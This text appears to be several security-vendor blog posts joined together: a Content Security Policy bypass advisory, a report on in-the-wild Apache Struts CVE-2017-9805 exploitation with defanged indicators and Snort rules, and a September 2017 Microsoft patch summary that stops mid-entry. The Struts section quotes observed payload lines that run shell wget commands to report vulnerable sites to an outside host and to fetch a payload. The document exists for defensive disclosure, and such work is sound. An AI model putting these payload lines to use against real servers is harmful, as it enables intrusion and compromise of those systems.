Content-Security-Policy: script-src 'self' https://good.example.com

allows scripts to be loaded only from the server the browser is currently visiting and an additional server good.example.com.

However, an information disclosure vulnerability exists within Microsoft Edge (not patched as of version 40.15063)), Google Chrome (patched) and Safari (patched). An attacker may be able to bypass the policy specified by the Content-Security-Policy header, causing an information leak.

There are three main components to an exploitation attempt: setting the Content-Security-Policy for the browser with "unsafe-inline" directive to allow for inline script code, then using window.open() to open a blank new window, and finally calling the document.write function to write code into the newly created blank window object in order to bypass CSP restrictions put on the document.

The issue, affecting the Microsoft Edge browser as well as older versions of Google Chrome and Firefox is that about:blank page has the same origin as its loading document, but with the CSP restrictions removed which allows for a successful exploitation.

More information about these vulnerabilities is available in the TALOS vulnerability report TALOS-2017-0306.

Discussion

Information disclosure vulnerabilities may not be as serious as the vulnerabilities allowing the attacker to launch remote code and escape the browser sandbox to access and control the system under attack.

However, XSS attacks that may allow an attacker to exfiltrate confidential data and even take over a user account are considered a serious issue. Content Security Policy is specifically designed with XSS attack prevention in mind and allows the server to whitelist trusted resources that are trusted to be safely executed by a web browser.

Many developers rely on CSP to protect them from XSS and other information disclosure attacks and trust browsers to support the standard. However, it seems that the implementation of CSP within different web browsers differs, allowing attackers to write browser specific code to bypass the content security policy defining the source of the allowed code.

Users are recommended to use browsers with more complete support for the Content security policy mechanism as well as browsers that keep up to date with all newly discovered security vulnerabilities, including information disclosure vulnerabilities such as the ones described in this post.

Affected versions

Microsoft Edge (not patched as of version 40.15063)

Google Chrome prior to version 57.0.2987.98 - (CVE-2017-5033)

iOS prior to version 10.3 - (CVE-2017-2419)

Apple Safari prior to version 10.1 - (CVE-2017-2419)

Coverage

The following Snort Rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org.

Snort Rule: 42112

This post authored by Nick Biasini with contributions from Alex Chiu.

Earlier this week, a critical vulnerability in Apache Struts was publically disclosed in a security advisory. This new vulnerability, identified as CVE-2017-9805, manifests due to the way the REST plugin uses XStreamHandler with an instance of XStream for deserialization without any type filtering. As a result, a remote, unauthenticated attacker could achieve remote code execution on a host running a vulnerable version of Apache Struts.

This isn't the only vulnerability that has been recently identified in Apache Struts. Earlier this year, Talos responded to a zero-day vulnerability that was under active exploitation in the wild. Talos has observed exploitation activity targeting CVE-2017-9805 in a way that is similar to how CVE-2017-5638 was exploited back in March 2017.

Details

Immediately after the reports surfaced related to this exploit, Talos began researching how it operated and began work to develop coverage to prevent successful exploitation. This was achieved and we immediately began seeing active exploitation in the wild. Thus far, exploitation appears to be primarily scanning activity, with outbound requests that appear to be identifying systems that are potentially vulnerable. Below is a sample of the type of HTTP requests we have been observing.

<string>/bin/sh</string><string>-c</string><string>wget -qO /dev/null http://wildkind[.]ru:8082/?vulnerablesite</string>

This would initiate a wget request that would write the contents of the HTTP response to /dev/null. This indicates it is purely a scanning activity that identifies to the remote server which websites are potentially vulnerable to this attack. This is also a strong possibility since it includes the compromised website in the URL. There was one other small variation that was conducting a similar request to the same website.

<string>/bin/sh</string><string>-c</string><string>wget -qO /dev/null http://wildkind[.]ru:8082/?`echo ...vulnerablesite...`</string>

During our research we found that the majority of the activity was trying to POST to the path of /struts2-rest-showcase/orders/3. Additionally most of the exploitation attempts are sending the data to wildkind[.]ru, with a decent amount of the requests originating from the IP address associated with wildkind[.]ru, 188.120.246[.]215.

Example of in the wild exploitation

Other exploitation attempts have been identified where Talos believes another threat actor appears to be exploiting the vulnerability for a different purpose. An example of the web requests found in the exploitation attempts can be found below.

<string>wget</string><string>hxxp://st2buzgajl.alifuzz[.]com/052</string>

Unfortunately, we were unable to retrieve the potentially malicious file that was being served at this particular location. If the previous Struts vulnerability is any indicator, the payloads could vary widely and encompass threats such as DDoS bots, spam bots, and various other malicious payloads.

IOCs

IP Addresses Observed:

• 188.120.246[.]215
• 101.37.175[.]165
• 162.158.182[.]26
• 162.158.111[.]235
• 141.101.76[.]226
• 141.101.105[.]240

Domains Contacted:

• wildkind[.]ru
• st2buzgajl.alifuzz[.]com

Commonly Used Path:

• /struts2-rest-showcase/orders/3

Mitigation

Apache has released a new version of Struts that resolves this issue. If you believe that you have a potentially vulnerable version of Apache struts there are two options: upgrade to Struts 2.5.13 / Struts 2.3.34 or remove the REST plugin if it's not actively being used. Instructions to achieve this are provided as part of the security bulletin and should be reviewed and tested before applying in a production environment. In the event it's not possible to upgrade or remove the REST plugin, limiting it to server normal pages and JSONs may help limit the risk the compromise.

Conclusion

This is the latest in a long line of vulnerabilities that are exposing servers to potential exploitation. In today's threat landscape a lot of attention is paid to endpoint systems being compromised, and with good reason, as it accounts for the majority of the malicious activity we observe on a daily basis. However, that does not imply that patching of servers should not be an extremely high priority. These types of systems, if compromised, can potentially expose critical data and systems to adversaries.

The vulnerability is yet another example of how quickly miscreants will move to take advantage of these types of issues. Within 48 hours of disclosure we were seeing systems activity exploiting the vulnerability. To their credit the researchers disclosed the vulnerability responsibly and a patch was available before disclosure occurred. However, with money at stake bad guys worked quickly to reverse engineer the issue and successfully develop exploit code to take advantage of it. In today's reality you no longer have weeks or months to respond to these type of vulnerabilities, it's now down to days or hours and every minute counts. Ensure you have protections in place or patches applied to help prevent your enterprise from being impacted.

Coverage

Talos has released the following Snort rule to address this vulnerability. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Snort Rule: 44315



Network Security appliances such as NGFW, NGIPS, and Meraki MX can detect malicious activity associated with this threat.

Microsoft has released its monthly set of security advisories for vulnerabilities that have been identified and addressed in various products. This month's advisory release addresses 81 new vulnerabilities with 27 of them rated critical, 52 rated important, and 2 rated moderate. These vulnerabilities impact Edge, Hyper-V, Internet Explorer, Office, Remote Desktop Protocol, Sharepoint, Windows Graphic Display Interface, Windows Kernel Mode Drivers, and more. In addition, Microsoft is also releasing an update for Adobe Flash Player embedded in Edge and Internet Explorer.

Note that the Bluetooth vulnerabilities known as "BlueBorne" that affected Windows have been patched in this latest release. For more information, please refer to CVE-2017-8628.

Vulnerabilities Rated Critical

The following vulnerabilities are rated "critical" by Microsoft:

• CVE-2017-8747 - Internet Explorer Memory Corruption Vulnerability
• CVE-2017-8749 - Internet Explorer Memory Corruption Vulnerability
• CVE-2017-8750 - Microsoft Browser Memory Corruption Vulnerability
• CVE-2017-8731 - Microsoft Edge Memory Corruption Vulnerability
• CVE-2017-8734 - Microsoft Edge Memory Corruption Vulnerability
• CVE-2017-8751 - Microsoft Edge Memory Corruption Vulnerability
• CVE-2017-8755 - Microsoft Edge Memory Corruption Vulnerability
• CVE-2017-8756 - Microsoft Edge Memory Corruption Vulnerability
• CVE-2017-11766 - Microsoft Edge Memory Corruption Vulnerability
• CVE-2017-8757 - Microsoft Edge Remote Code Execution Vulnerability
• CVE-2017-8696 - Microsoft Graphics Component Remote Code Execution
• CVE-2017-8728 - Microsoft PDF Remote Code Execution Vulnerability
• CVE-2017-8737 - Microsoft PDF Remote Code Execution Vulnerability
• CVE-2017-0161 - NetBIOS Remote Code Execution Vulnerability
• CVE-2017-8649 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-8660 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-8729 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-8738 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-8740 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-8741 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-8748 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-8752 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-8753 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-11764 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-8682 - Win32k Graphics Remote Code Execution Vulnerability
• CVE-2017-8686 - Windows DHCP Server Remote Code Execution Vulnerability
• CVE-2017-8676 - Windows GDI+ Information Disclosure Vulnerability

The following briefly describes these vulnerabilities.

CVE-2017-8747, CVE-2017-8749 - Internet Explorer Memory Corruption Vulnerability

Two vulnerabilities have been identified in Internet Explorer that could result in remote code execution in the context of the current user. These vulnerabilities manifest due to improper handling of objects in memory when attempting to render a webpage. Both vulnerabilities could be exploited if, for example, a user visits a specially crafted webpage that exploits one of these flaws.

CVE-2017-8750 - Microsoft Browser Memory Corruption Vulnerability

A vulnerability have been identified in Edge and Internet Explorer that could result in remote code execution in the context of the current user. This vulnerability manifests due to improper handling of objects in memory when attempting to render a webpage. This vulnerability could be exploited if, for example, a user visits a specially crafted webpage that exploits this flaw.

Multiple CVEs - Microsoft Edge Memory Corruption Vulnerability

Multiple vulnerabilities have been identified in Microsoft Edge that could allow an attacker to execute arbitrary code on an affected host. These vulnerabilities manifest due to improper handling of objects in memory. Successful exploitation of this vulnerability would result in arbitrary code execution in the context of the current user. Users who visit a specially crafted web page under the control of the attacker could be exploited.

The following is a list of CVEs that reflect these vulnerabilities:

• CVE-2017-8731
• CVE-2017-8734
• CVE-2017-8751
• CVE-2017-8755
• CVE-2017-8756
• CVE-2017-11766

CVE-2017-8757 - Microsoft Edge Remote Code Execution Vulnerability

A vulnerability have been identified in Edge that could result in remote code execution in the context of the current user. This vulnerability manifests due to improper handling of objects in memory when attempting to render a webpage. This vulnerability could be exploited if, for example, a user visits a specially crafted webpage that exploits this flaw. Alternatively, an attacker could embed an ActiveX control marked "safe for initialization" within a Microsoft Office document that "hosts the browser rendering engine" and socially engineer the user to open the malicious document.

CVE-2017-8696 - Microsoft Graphics Component Remote Code Execution Vulnerability

A vulnerability has been identified in Windows Uniscribe that could allow an attacker to remotely execute arbitrary code on an affected host. This vulnerability manifests due to improper handling of objects in memory. Exploitation of this vulnerability could be achieved if a user navigates to a malicious web page or opens a malicious file designed to exploit this vulnerability. Successful exploitation would result in arbitrary code execution in the context of the current user.

CVE-2017-8728, CVE-2017-8737 - Microsoft PDF Remote Code Execution Vulnerability

Two vulnerabilities in the Microsoft Windows PDF library have been identified that could allow an attacker to execute arbitrary code on a targeted host. These vulnerabilities manifest due to improper handling of objects in memory. Successful exploitation of these vulnerabilities would result in arbitrary code execution in the context of the current user. Users who open a specially crafted PDF file or who visit a web page containing a specially crafted PDF could exploit these vulnerabilities.

CVE-2017-0161 - NetBIOS Remote Code Execution Vulnerability

A vulnerability in NetBT Session Services has been identified that could allow an attacker to execute arbitrary code on the targeted host remotely. This vulnerability manifests as a race condition "when NetBT fails to maintain certain sequencing requirements." An attacker who sends specially crafted NetBT Session Service packets to the targeted system could exploit this vulnerability and achieve remote code execution.

Multiple CVEs - Scripting Engine Memory Corruption Vulnerability

Multiple vulnerabilities have been identified in the Microsoft Browser JavaScript engine that could allow remote code execution to occur in the context of the current user. These vulnerabilities manifest due to improper handling of objects in memory, resulting in memory corruption. Exploitation of these vulnerabilities is achievable if a user visits a specially crafted web page that contains JavaScript designed to exploit one or more of these vulnerabilities.

The following is a list of CVEs that reflect these vulnerabilities:

• CVE-2017-8649
• CVE-2017-8660
• CVE-2017-8729
• CVE-2017-8738
• CVE-2017-8740
• CVE-2017-8741
• CVE-2017-8748
• CVE-2017-8752
• CVE-2017-8753
• CVE-2017-11764

CVE-2017-8682 - Win32k Graphics Remote Code Execution Vulnerability

A vulnerability in the Windows font library has been identified that could allow an attacker to execute arbitrary code on an affected host. This vulnerability manifests due to improper handling of embedded fonts. Successful exploitation of this vulnerability would result in arbitrary code execution in the context of the current user. For this vulnerability to be exploited, a user would need to either navigate to a specially crafted website or open a specially crafted document that is designed to exploit this flaw.

CVE-2017-8686 - Windows DHCP Server Remote Code Execution Vulnerability

A vulnerability has been identified in the Windows Server DHCP service where remote code execution could be achieved if exploited. This vulnerability manifests as a result of the service incorrectly handling DHCP packets. Successful exploitation could allow an attacker to remotely execute code on an affected host or create a denial of service condition. For this vulnerability to be exploited, an attacker would need to send a specially crafted packet to the DHCP server that is set to failover mode. If the server is not set to failover mode, the attack will not succeed.

CVE-2017-8676 - Windows GDI+ Information Disclosure Vulnerability

An information disclosure vulnerability have been identified in the Windows Graphics Device Interface+ (GDI+) that could allow an attacker to obtain potentially sensitive information about the affected host. This vulnerability manifests due to the Windows GDI+ component improperly handling objects in memory. An attacker who runs a specially crafted executable could exploit this vulnerability and leverage the information to further compromise the host.

Vulnerabilities Rated Important

The following vulnerabilities are rated "important" by Microsoft:

• CVE-2017-8759 - .NET Framework Remote Code Execution Vulnerability
• CVE-2017-9417 - Broadcom BCM43xx Remote Code Execution Vulnerability
• CVE-2017-8746 - Device Guard Security Feature Bypass Vulnerability
• CVE-2017-8695 - Graphics Component Information Disclosure Vulnerability
• CVE-2017-8704 - Hyper-V Denial of Service Vulnerability
• CVE-2017-8706 - Hyper-V Information Disclosure Vulnerability
• CVE-2017-8707 - Hyper-V Information Disclosure Vulnerability
• CVE-2017-8711 - Hyper-V Information Disclosure Vulnerability
• CVE-2017-8712 - Hyper-V Information Disclosure Vulnerability
• CVE-2017-8713 - Hyper-V Information Disclosure Vulnerability
• CVE-2017-8733 - Internet Explorer Spoofing Vulnerability
• CVE-2017-8628 - Microsoft Bluetooth Driver Spoofing Vulnerability
• CVE-2017-8736 - Microsoft Browser Information Disclosure Vulnerability
• CVE-2017-8597 - Microsoft Edge Information Disclosure Vulnerability
• CVE-2017-8643 - Microsoft Edge Information Disclosure Vulnerability
• CVE-2017-8648 - Microsoft Edge Information Disclosure Vulnerability
• CVE-2017-8754 - Microsoft Edge Security Feature Bypass Vulnerability
• CVE-2017-8724 - Microsoft Edge Spoofing Vulnerability
• CVE-2017-8758 - Microsoft Exchange Cross-Site Scripting Vulnerability
• CVE-2017-11761 - Microsoft Exchange Information Disclosure Vulnerability
• CVE-2017-8630 - Microsoft Office Memory Corruption Vulnerability
• CVE-2017-8631 - Microsoft Office Memory Corruption Vulnerability
• CVE-2017-8632 - Microsoft Office Memory Corruption Vulnerability
• CVE-2017-8744 - Microsoft Office Memory Corruption Vulnerability
• CVE-2017-8725 - Microsoft Office Publisher Remote Code Execution
• CVE-2017-8567 - Microsoft Office Remote Code Execution
• CVE-2017-8745 - Microsoft SharePoint Cross Site Scripting Vulnerability
• CVE-2017-8629 - Microsoft SharePoint XSS Vulnerability
• CVE-2017-8742 - PowerPoint Remote Code Execution Vulnerability
• CVE-2017-8743 - PowerPoint Remote Code Execution Vulnerability
• CVE-2017-8714 - Remote Desktop Virtual Host Remote Code Execution Vulnerability
• CVE-2017-8739 - Scripting Engine Information Disclosure Vulnerability
• CVE-2017-8692 - Uniscribe Remote Code Execution Vulnerability
• CVE-2017-8675 - Win32k Elevation of Privilege Vulnerability
• CVE-2017-8720 - Win32k Elevation of Privilege Vulnerability
• CVE-2017-8683 - Win32k Graphics Information Disclosure Vulnerability
• CVE-2017-8677 - Win32k Information Disclosure Vulnerability
• CVE-2017-8678 - Win32k Information Disclosure Vulnerability
• CVE-2017-8680 - Win32k Information Disclosure Vulnerability
• CVE-2017-8681 - Win32k Information Disclosure Vulnerability
• CVE-2017-8687 - Win32k Information Disclosure Vulnerability
• CVE-2017-8702 - Windows Elevation of Privilege Vulnerability
• CVE-2017-8684 - Windows GDI+ Information Disclosure Vulnerability
• CVE-2017-8685 - Windows GDI+ Information Disclosure Vulnerability
• CVE-2017-8688 - Windows GDI+ Information Disclosure Vulnerability
• CVE-2017-8710 - Windows Information Disclosure Vulnerability
• CVE-2017-8679 - Windows Kernel Information Disclosure Vulnerability
• CVE-2017-8708 - Windows Kernel Information Disclosure Vulnerability
• CVE-2017-8709 - Windows Kernel Information Disclosure Vulnerability
• CVE-2017-8719 - Windows Kernel Information Disclosure Vulnerability
• CVE-2017-8716 - Windows Security Feature Bypass Vulnerability
• CVE-2017-8699 - Windows Shell Remote Code Execution Vulnerability

The following briefly describes these vulnerabilities.

CVE-2017-8759 - .NET Framework Remote Code Execution Vulnerability

A vulnerability has been identified in the Microsoft .NET Framework that could allow an attacker to execute arbitrary code on an affected device. This vulnerability manifests due to improperly handling untrusted input. Successful exploitation could result in an attacker being able to execute arbitrary code in the context of the current user. A user who opens a malicious document or application could be exploited and compromised via this vulnerability.

CVE-2017-9417 - Broadcom BCM43xx Remote Code Execution Vulnerability

A vulnerability has been identified in the Broadcom chipsets used in HoloLens that could allow an attacker to execute arbitrary code on an affected device. This vulnerability manifests due to improper handling of Wi-fi packets. Successful exploitation of this vulnerability could result in an attacker being able to take full control of the device with administrator privileges.

CVE-2017-8746 - Device Guard Security Feature Bypass Vulnerability

A vulnerability had been identified in Device Guard that could allow an attacker bypass a security control and inject malicious code into a Windows Powershell session. This vulnerability manifests as a flaw in how the Device Guard Code Integrity policy is implemented. An attacker who has access to a local machine could inject malicious into a script that is trusted by the Code Integrity policy. As a result, the injected code could run with the same trust level as the script, bypassing the Code Integrity policy control.

CVE-2017-8695 - Graphics Component Information Disclosure Vulnerability

An information disclosure vulnerability has been identified in Windows Uniscribe that could allow an attacker to obtain important system information. This information could then be used to further compromise a user's system via another vulnerability. Exploitation of this vulnerability could be achieved if a user opens a specially crafted document or visited a malicious web page that is designed to exploit this vulnerability.

CVE-2017-8704 - Hyper-V Denial of Service Vulnerability

A denial of service vulnerability has been identified in Microsoft Hyper-V that could cause the host machine to crash. This vulnerability manifests due to the host server improperly validating input from a privileged user within a guest operating system. An attacker who has privileged access in a guest operating system on the affected host could execute a specially crafted application could trigger this vulnerability.

Multiple CVEs - Hyper-V Information Disclosure Vulnerability

Multiple information disclosure vulnerabilities have been identified in Windows Hyper-V that could allow an attacker to access sensitive information on the Hyper-V host operating system. These vulnerabilities manifest due to Hyper-V improperly validating input from an authenticated user inside a guest operating system. An attacker who has access to a guest VM and executes a specially crafted application within the guest VM could exploit this vulnerability and obtain information on the Hyper-V host.

The following is a list of CVEs that reflect these vulnerabilities:

• CVE-2017-8706
• CVE-2017-8707
• CVE-2017-8711
• CVE-2017-8712
• CVE-2017-8713

CVE-2017-8733 - Internet Explorer Spoofing Vulnerability

A spoofing vulnerability in Internet Explorer has been identified that could allow an attacker to trick the user into believing they were visiting a legitimate web site. This vulnerability manifests due to Internet Explorer incorrectly handling specific HTML content. A user who navigates to a specially crafted web page under the control of the attacker could be exploited. As a result, this malicious website could then be used to serve spoofed content to the user or to serve as part of a exploit chain designed to compromise the affected host.

CVE-2017-8628 - Microsoft Bluetooth Driver Spoofing Vulnerability

A spoofing vulnerability has been identified in Microsoft's implementation of the Bluetooth stack and has been disclosed as part of "BlueBorne" series of vulnerabilities. This vulnerability could allow an attacker to perform a man-in-the-middle attack and force a user's device to "unknowingly route traffic through the attacker's computer." For this exploit to be possible, an attacker would need to be within physical proximity to the targeted device and the targeted device would need to have Bluetooth enabled. Note that if both of these conditions are satisfied, an attacker could "initiate a Bluetooth connection to the target computer without the user's knowledge."

CVE-2017-8736 - Microsoft Browser Information Disclosure Vulnerability

A vulnerability in Microsoft Edge and Internet Explorer has been identified that could allow an attacker to obtain information regarding the user's current session. This vulnerability manifests due to the browser improperly verifying parent domains in certain functionality. An attacker who socially engineers a user to visiting a specially crafted web page could exploit this flaw and obtain information that is specific to the parent domain.

CVE-2017-8597, CVE-2017-8648 - Microsoft Edge Information Disclosure Vulnerability

Multiple vulnerabilities in Microsoft Edge have been identified that could allow an attacker to discover sensitive information regarding the targeted system. These vulnerabilities manifest due to improper handling of objects in memory. Successful exploitation of these vulnerabilities could given an attacker the necessary information to further exploit additional vulnerabilities on the system.

CVE-2017-8643 - Microsoft Edge Information Disclosure Vulnerability

An vulnerability in Microsoft Edge has been identified that could permit the disclosure of potentially sensitive information. This vulnerability manifests due to Microsoft Edge improperly handling clipboard events. Exploitation of this vulnerability is achievable if an attacker socially engineers a user to open a specially crafted web page that exploits this flaw. As long has this web page remains open, an attacker would be able to able to gain knowledge of clipboard activities.

CVE-2017-8754 - Microsoft Edge Security Feature Bypass Vulnerability

A vulnerability in Microsoft Edge has been identified that could allow an attacker to bypass the Content Security Policy (CSP) feature. This vulnerability manifests due to improperly validating certain specially crafted documents. Successful exploitation could allow an attacker to redirect users to a malicious web page. Users who visit a specially crafted web page under the control of the attacker could be exploited. Alternatively, users who visit a compromised web page or who get served a malicious advertisement an attacker has injected into an advertising network could be exploited.

CVE-2017-8724 - Microsoft Edge Spoofing Vulnerability

A vulnerability in Edge has been identified that could allow an attacker to spoof content on a targeted host. This vulnerability manifests due to improper parsing of HTTP content. Successful exploitation of this vulnerability would result in the user being redirected to a web site of the attacker's choosing. This web site could then spoof content or serve as part of an exploit chain whereby the user could be exploited via another vulnerability. Scenarios where a user could be attacked include email or instant message vectors where the user clicks on a malicious link, or the user navigates to a specially crafted web page under the control of the attacker.

CVE-2017-8758 - Microsoft Exchange Cross-Site Scripting Vulnerability

A cross-site scripting vulnerability in Microsoft Exchange has been identified that could allow an attacker to perform a content/script injection attack. This vulnerability manifests due to Exchange failing to properly handle web requests. An attacker who sends an intended victim a specially crafted email containing a malicious link could exploit this vulnerability and potentially trick the user into disclosing sensitive information.

CVE-2017-11761 - Microsoft Exchange Information Disclosure Vulnerability

A vulnerability in Microsoft Exchange has been identified that could allow an attacker to obtain information regarding the affected server's local network. This vulnerability manifests as an information disclosure flaw due to improper input sanitization. An attacker who includes specially crafted tags in a Calendar-related message and sends this to an affected Exchange server could exploit this flaw and enumerate internal hosts assigned an RFC 1918 IP address. This information could then be used as part of a larger attack.

Multiple CVEs - Microsoft Office Memory Corruption Vulnerability

Multiple vulnerabilities have been identified affecting Microsoft Office that could allow an attacker to execute arbitrary code on an affected system. These vulnerabilities manifest due to Office improperly handling objects in memory. A users who opens a maliciously crafted Office document could be exploited, resulting in arbitrary code execution of the attacker's choice in the context of the current user. Scenarios where this could occur include email-based attacks, where the attacker sends the victim a message with a malicious attachment, or web-based attacks where the user downloads and opens a malicious Office document.

The following is a list of CVEs that reflect these vulnerabilities:

• CVE-2017-8630
• CVE-2017-8631
• CVE-2017-8632
• CVE-2017-8744

CVE-2017-8725 - Microsoft Office Publisher Remote Code Execution

A vulnerability has been identified affecting Microsoft Office Publisher that could allow an attacker to execute arbitrary code on an affected system. This vulnerability manifests due to Publisher improperly handling objects in memory. A users who opens a maliciously crafted Publisher document could be exploited, resulting in arbitrary code execution of the attacker's choice in the context of the current user. Scenarios where this could occur include email-based attacks, where the attacker sends the victim a message with a malicious attachment, or web-based attacks where the user downloads and opens a malicious Publisher document.

CVE-2017-8567 - Microsoft Office Remote Code Execution

A vulnerability has been identified affecting Microsoft Office that could allow an attacker to execute arbitrary code on an affected system. This vulnerability manifests due to Office improperly handling objects in memory. A user who opens a maliciously crafted document could be exploited, resulting in arbitrary code execution of the attacker's choice in the context of the current user. Scenarios where this could occur include email-based attacks, where the attacker sends the victim a message with a malicious attachment, or web-based attacks where the user downloads and opens a malicious Office document. Note that Preview Pane is not an attack vector for this vulnerability.

CVE-2017-8745, CVE-2017-8629 - Microsoft SharePoint XSS Vulnerability

Two vulnerabilities in Microsoft Sharepoint have been identified that could could allow an attacker to execute a cross-site scripting (XSS) attack. These vulnerabilities manifest due to Sharepoint Server improperly sanitizing specific web requests from a user. Successful exploitation of these flaws could allow an attacker to execute script in the context of the current user, read content that the attacker would not have permission to otherwise view, or execute actions on behalf of the affected user.

CVE-2017-8742, CVE-2017-8743 - PowerPoint Remote Code Execution Vulnerability

Two vulnerabilities have been identified affecting Microsoft Office Powerpoint that could allow an attacker to execute arbitrary code on an affected system. These vulnerabilities manifest due to Powerpoint improperly handling objects in memory. A user who opens a maliciously crafted Powerpoint document could be exploited, resulting in arbitrary code execution of the attacker's choice in the context of the current user. Scenarios where this could occur include email-based attacks, where the attacker sends the victim a message with a malicious attachment, or web-based attacks where the user downloads and opens a malicious Powerpoint document.

CVE-2017-8714 - Remote Desktop Virtual Host Remote Code Execution Vulnerability

A vulnerability has been identified in the VM Host Agent Service of Remote Desktop Virtual Host that could allow an attacker to execute arbitrary code on an affected host. This vulnerability manifests due to improperly validating input from an authenticated user within a guest operating system. Exploitation of this flaw is achievable if an attacker issues a "specially crafted certificate" within a guest operating system, causing the "VM host agent service on the host operating system to execute arbitrary code." Microsoft notes that the Remote Desktop Virtual Host role is not enabled by default.

CVE-2017-8739 - Scripting Engine Information Disclosure Vulnerability

A vulnerability in Microsoft Edge has been identified that could disclose sensitive information to an attacker. This vulnerability manifests due to improper handling of objects in memory. Successful exploitation of this vulnerability would result in an attacker obtaining information that could then be used to further exploit the system. Users who visit a specially crafted web page under the control of the attacker could be exploited.

CVE-2017-8692 - Uniscribe Remote Code Execution Vulnerability

An arbitrary code execution vulnerability has been identified in Windows Uniscribe that could allow an attacker to execute code in the context of the current user. This vulnerability manifests due to Uniscribe improperly handling objects in memory. Exploitation of this vulnerability could be achieved if a user navigates to a malicious web page or opens a malicious file designed to exploit this vulnerability.

CVE-2017-8593 - Win32k Elevation of Privilege Vulnerability

A vulnerability in Windows Kernel Mode Drivers has been identified that could allow a privilege escalation attack to occur. This vulnerability manifests due to improper handling of objects in memory. Successful exploitation of this vulnerability could result in an attacker being able to execute arbitrary code in kernel mode. An attacker who executes a specially crafted executable could exploit this vulnerability and as a result, gain full control of the affected system.

CVE-2017-8720 - Win32k Elevation of Privilege Vulnerability

A vulnerability in the Win32k component in Windows has been identified that could allow a privilege escalation attack to occur. This vulnerability manifests due to improper handling of objects in memory. Successful exploitation of this vulnerability would result in an attacker obtaining administrator privileges on the targeted system. Users who run a specially crafted executable that exploits this vulnerability could leverage this vulnerability to perform actions as an administrator on the affected system.

CVE-2017-8683 - Win32k Graphics Information Disclosure Vulnerability

An information disclosure vulnerability has been identified in the Windows Graphics Component that could allow an attacker to gain information about the host. This vulnerability manifests due to the Graphics Component improperly handling objects in memory. An attacker who runs a specially crafted executable could exploit this vulnerability and leverage the information to further compromise the host.

CVE-2017-8678 - Win32k Information Disclosure Vulnerability

An information disclosure vulnerability has been identified in the Windows kernel that could allow an attacker to gain information about the host. This vulnerability manifests due to the kernel improperly handling objects in memory. An attacker who runs a specially crafted executable could exploit this vulnerability and leverage the information to further compromise the host.

Multiple CVEs - Win32k Information Disclosure Vulnerability

Multiple information disclosure vulnerabilities have been identified in the Windows Graphics Device Interface+ (GDI+) component that could allow an attacker to gain information about the host. This vulnerability manifests due to the GDI+ component improperly handling objects in memory. An attacker who runs a specially crafted executable could exploit this vulnerability and leverage the information to further compromise the host.

The following is a list of CVEs that reflect these vulnerabilities:

• CVE-2017-8677
• CVE-2017-8680
• CVE-2017-8681

CVE-2017-8687 - Win32k Information Disclosure Vulnerability

An information disclosure vulnerability has been identified in the Windows kernel that could allow an attacker to gain information which could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. This vulnerability manifests due to the kernel improperly handling objects in memory. An attacker who runs a specially crafted executable could exploit this vulnerability and obtain the "memory address of a kernel object," allowing an attacker to leverage the information to further compromise the host.

CVE-2017-8702 - Windows Elevation of Privilege Vulnerability

A vulnerability in the Windows Error Reporting (WER) has been identified that could allow a privilege escalation attack to occur. Successful exploitation of this vulnerability would result in an attacker obtaining administrator privileges on the targeted system.

Multiple CVEs - Windows GDI+ Information Disclosure Vulnerability

Multiple information disclosure vulnerabilities have been identified in the Windows Graphics Device Interface+ (GDI+) that could allow an attacker to obtain potentially sensitive information about the affected host. These vulnerabilities manifest due to the Windows GDI+ component improperly handling objects in memory. An attacker who runs a specially crafted executable could exploit this vulnerability and leverage the information to further compromise the host.

The following is a list of CVEs that reflect these vulnerabilities:

• CVE-2017-8684
• CVE-2017-8685
• CVE-2017-8688

CVE-2017-8710 - Windows Information Disclosure Vulnerability

An information disclosure vulnerability in the Windows System Information Console has been identified that could allow an attacker to read arbitrary files on an affected system. This vulnerability manifests due to improper parsing of XML input which contains a reference to an external entity. An attacker who creates specially crafted file containing XML content and either opens the file or socially engineers an user to open the file on an affected system could exploit this vulnerability.

Multiple CVEs - Windows Kernel Information Disclosure Vulnerability

Multiple information disclosure vulnerabilities have been identified in the Windows kernel that could allow an attacker gain information about the host. These vulnerabilities manifest due to the kernel improperly handling objects in memory. An attacker who runs a specially crafted executable could exploit these vulnerabilities and leverage the information to further compromise the host.

The following is a list of CVEs that reflect these vulnerabilities:

• CVE-2017-8679
• CVE-2017-8709
• CVE-2017-8719

CVE-2017-8708 - Windows Kernel Information Disclosure Vulnerability

An information disclosure vulnerability has been identified in the Windows kernel that could allow an attacker to gain information which could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. This vulnerability manifests due to the kernel failing to properly initialize a memory address. An attacker who runs a specially crafted executable could exploit this vulnerability and obtain the "base address of the kernel driver from a compromised process," allowing an attacker to leverage the information to further compromise the host.

CVE-2017-8716 - Windows Security Feature Bypass Vulnerability

A vulnerability has been identified in Windows Control Flow Guard that could allow an attacker bypass its intended function. This vulnerability manifests due to the Control Flow Guard mishandling objects in memory. An attacker who runs a specially crafted executable on an affected host could exploit this vulnerability.

CVE-2017-8699 - Windows Shell Remote Code Execution Vulnerability

An arbitrary code execution vulnerability has been identified in the Windows Shell that could allow an attacker to execute code in the context of the current user. This vulnerability manifests as a result of Window Shell improperly validating file copy destinations. An attacker who opens a specially crafted file could exploit this vulnerability. Scenarios where end-user could be compromised include email-based attacks, where an attacker send the victim a malicious attachment that the user opens, or a web-based attack where the user downloads and opens a malicious file.

Vulnerabilities Rated Moderate

The following vulnerabilities are rated "moderate" by Microsoft:

• CVE-2017-8723 - Microsoft Edge Security Feature Bypass Vulnerability
• CVE-2017-8735 - Internet Explorer Memory Corruption Vulnerability

The following briefly describes these vulnerabilities.

CVE-2017-8723 - Microsoft Edge Security Feature Bypass Vulnerability

